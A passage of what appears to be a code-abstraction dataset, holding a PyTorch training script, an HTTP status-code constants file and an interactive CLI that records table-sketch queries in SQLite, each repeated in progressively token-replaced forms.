batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n 
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n metrics = ['performance']\n metrics = {m: AverageMeter(m, ':.4e') for m in metrics}\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses, *metrics.values()], prefix='Test:\\t')\n model.eval()\n global_step = model.global_step\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, ':.3f')\n metrics[k].update(v)\n batch_time.update(time.time() - end)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n writer.add_scalar('loss/test', losses.avg, global_step)\n writer.add_scalar('time/batch/test', batch_time.avg, global_step)\n writer.add_scalar('time/data/test', data_time.avg, global_step)\n for k, v in metrics.items():\n writer.add_scalar(f'{k}/test', v.avg, global_step)\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run script')\n parser.add_argument('--config', '-c', type=str, required=False, default\n ='config')\n args = parser.parse_args()\n git_state = get_git_state()\n config = importlib.import_module(f'configs.{args.config}').config\n config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(\n '%Y-%m-%d_%H:%M:%S')\n config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id\n config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id\n config.log.misc_dir.mkdir(exist_ok=True, parents=True)\n config.log.tb_dir.mkdir(exist_ok=True, parents=True)\n torch.manual_seed(config.rnd_seed)\n np.random.seed(config.rnd_seed)\n random.seed(config.rnd_seed)\n if getattr(config, 'anomaly_detection', False):\n torch.autograd.set_detect_anomaly(True)\n global writer\n writer = SummaryWriter(log_dir=config.log.tb_dir, comment=\n f'{config.description}, {git_state}')\n time_print(pprint.pformat(config))\n time_print(f'Git head at state: {git_state}')\n try:\n if (npp := getattr(config, 'n_process_pool', 0)):\n with torch.multiprocessing.Pool(npp) as pool:\n main(config, pool=pool)\n else:\n main(config)\n except KeyboardInterrupt:\n 
time_print(f'Keyboard interrupt')\n exit(0)\n", "<import token>\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n metrics = ['performance']\n metrics = {m: AverageMeter(m, ':.4e') for m in metrics}\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses, *metrics.values()], prefix='Test:\\t')\n model.eval()\n global_step = model.global_step\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, ':.3f')\n metrics[k].update(v)\n batch_time.update(time.time() - end)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n writer.add_scalar('loss/test', losses.avg, global_step)\n writer.add_scalar('time/batch/test', batch_time.avg, global_step)\n writer.add_scalar('time/data/test', data_time.avg, global_step)\n for k, v in metrics.items():\n writer.add_scalar(f'{k}/test', v.avg, global_step)\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\n<code token>\n", "<import token>\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, 
data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\n<function token>\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\n<code token>\n", "<import token>\n<function token>\n<function token>\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\n<code token>\n", "<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
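The training/evaluation script in the entry above contains no import statements, yet it calls several helpers (AverageMeter, ProgressMeter, time_print, save_checkpoint, get_git_state) that must come from elsewhere in its repository. Below is a minimal sketch of the two meters and the print helper, matching only the attributes and calls the script actually uses (update(), .avg, display() with a print_fn); the project's real implementations may differ.

import time

class AverageMeter:
    # Tracks the latest value plus a running average; the script reads .avg.
    def __init__(self, name, fmt=':f'):
        self.name, self.fmt = name, fmt
        self.val = self.avg = self.sum = self.count = 0
    def update(self, val, n=1):
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count
    def __str__(self):
        return ('{name} {val' + self.fmt + '} ({avg' + self.fmt + '})').format(**self.__dict__)

class ProgressMeter:
    # Joins a batch counter and the meters into one status line.
    def __init__(self, num_batches, meters, prefix=''):
        self.num_batches, self.meters, self.prefix = num_batches, meters, prefix
    def display(self, batch, print_fn=print):
        entries = [f'{self.prefix}[{batch}/{self.num_batches}]']
        entries += [str(m) for m in self.meters]
        print_fn('\t'.join(entries))

def time_print(*args, **kwargs):
    # Timestamped print, inferred from the name and the call sites above.
    print(time.strftime('[%H:%M:%S]'), *args, **kwargs)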
92
d90942f22cbbd9cfc3a431b7857cd909a7690966
OK = 200
CREATED = 201
NOT_MODIFIED = 304
UNAUTHORIZED = 401
FORBIDDEN = 403
BAD_REQUEST = 400
NOT_FOUND = 404
CONFLICT = 409
UNPROCESSABLE = 422
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
SERVICE_UNAVAILABLE = 503

ADMIN = 'admin'
ELITE = 'elite'
NOOB = 'noob'
WITHDRAW = 'withdraw'
FUND = 'fund'
[ "OK = 200\nCREATED = 201\nNOT_MODIFIED = 304\nUNAUTHORIZED = 401\nFORBIDDEN = 403\nBAD_REQUEST = 400\nNOT_FOUND = 404\nCONFLICT = 409\nUNPROCESSABLE = 422\nINTERNAL_SERVER_ERROR = 500\nNOT_IMPLEMENTED = 501\nSERVICE_UNAVAILABLE = 503\n\nADMIN = 'admin'\nELITE = 'elite'\nNOOB = 'noob'\nWITHDRAW = 'withdraw'\nFUND = 'fund'\n", "OK = 200\nCREATED = 201\nNOT_MODIFIED = 304\nUNAUTHORIZED = 401\nFORBIDDEN = 403\nBAD_REQUEST = 400\nNOT_FOUND = 404\nCONFLICT = 409\nUNPROCESSABLE = 422\nINTERNAL_SERVER_ERROR = 500\nNOT_IMPLEMENTED = 501\nSERVICE_UNAVAILABLE = 503\nADMIN = 'admin'\nELITE = 'elite'\nNOOB = 'noob'\nWITHDRAW = 'withdraw'\nFUND = 'fund'\n", "<assignment token>\n" ]
false
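Constants modules like the one above exist so that API handlers return named status codes and role strings instead of magic literals. A hypothetical caller (the function, its arguments, and the module name status are illustrative only, not from the original project) might use them as follows:

from status import OK, FORBIDDEN, NOT_FOUND, ADMIN

def view_account(accounts, account_id, requester_role):
    # Only admins may inspect arbitrary accounts.
    if requester_role != ADMIN:
        return {'error': 'admin role required'}, FORBIDDEN
    account = accounts.get(account_id)
    if account is None:
        return {'error': 'no such account'}, NOT_FOUND
    return account, OK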
93
54ec1961f4835f575e7129bd0b2fcdeb97be2f03
import configparser
import sqlite3
import time
import uuid

from duoquest.tsq import TableSketchQuery

def input_db_name(conn):
    while True:
        db_name = input('Database name (default: concert_singer) > ')
        if not db_name:
            db_name = 'concert_singer'
        cur = conn.cursor()

        cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
        if cur.fetchone():
            break
        else:
            print(f'<{db_name}> is not a valid database.')
    return db_name

def input_nlq():
    nlq = input('NLQ (default: How many singers are there?)> ')
    if not nlq:
        nlq = 'How many singers are there?'
    return nlq

def input_num_cols():
    while True:
        num_cols = input('Number of columns > ')
        try:
            num_cols = int(num_cols)
            break
        except Exception as e:
            print('Number of columns should be integer!')
    return num_cols

def input_order():
    ordered = False
    while True:
        order_input = input('Should results be ordered? (y/n) > ')
        if order_input == 'y':
            ordered = True
            break
        elif order_input == 'n':
            break
        else:
            print('y/n only!')
    return ordered

def input_limit():
    limit = None
    while True:
        limit_input = input('Limit results to n tuples? (int or blank) > ')
        if not limit_input:
            break
        try:
            limit = int(limit_input)
            break
        except Exception as e:
            print('int or blank only!')
    return limit

def input_tsq_types(num_cols):
    while True:
        types_input = input('Types (`text` or `number`, comma separated)> ')
        types = list(map(lambda x: x.strip(), types_input.split(',')))

        if any(map(lambda x: x not in ('text', 'number'), types)):
            print('Types must be `text` or `number`')
            continue

        if len(types) != num_cols:
            print('Number of types must match number of columns.')
            continue
        break

    return types

def input_tsq_row_count():
    tsq_row_count = 0
    while True:
        tsq_row_count_input = input('Number of TSQ rows (int) > ')
        try:
            tsq_row_count = int(tsq_row_count_input)
            break
        except Exception as e:
            print('int only!')
    return tsq_row_count

def input_tsq_row(row_num, tsq_types):
    while True:
        row_input = input(f'Row {row_num} (semicolon-separated values) > ')
        tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))

        validated = True
        for i, cell in enumerate(tsq_row):
            if tsq_types[i] == 'number':
                try:
                    float(cell)
                except Exception as e:
                    print('At least one cell value is invalid.')
                    validated = False
                    break
        if validated:
            break

    return tsq_row

def main():
    config = configparser.ConfigParser()
    config.read('config.ini')
    db_path = config['db']['path']

    conn = sqlite3.connect(db_path)

    db_name = input_db_name(conn)
    nlq = input_nlq()
    num_cols = input_num_cols()

    tsq = TableSketchQuery(num_cols)

    tsq.types = input_tsq_types(num_cols)

    tsq_row_count = input_tsq_row_count()
    for i in range(tsq_row_count):
        tsq.values.append(input_tsq_row(i + 1, tsq.types))

    tsq.order = input_order()
    tsq.limit = input_limit()

    print(tsq.to_proto())

    cur = conn.cursor()
    cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
                   VALUES (?, ?, ?, ?, ?, ?)''',
                (str(uuid.uuid4()), db_name, nlq,
                 tsq.to_proto().SerializeToString(), 'waiting',
                 int(time.time())))
    conn.commit()
    conn.close()

if __name__ == '__main__':
    main()
[ "import configparser\nimport sqlite3\nimport time\nimport uuid\n\nfrom duoquest.tsq import TableSketchQuery\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n\n return types\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n\n return tsq_row\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n\n conn = sqlite3.connect(db_path)\n\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n\n tsq = TableSketchQuery(num_cols)\n\n tsq.types = input_tsq_types(num_cols)\n\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i+1, tsq.types))\n\n tsq.order = input_order()\n tsq.limit = input_limit()\n\n print(tsq.to_proto())\n\n cur = conn.cursor()\n cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)''',\n (str(uuid.uuid4()), db_name, nlq,\n tsq.to_proto().SerializeToString(), 'waiting',\n int(time.time())))\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n main()\n", "import configparser\nimport sqlite3\nimport time\nimport uuid\nfrom duoquest.tsq import TableSketchQuery\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = 
conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef 
input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? 
(y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? 
(int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 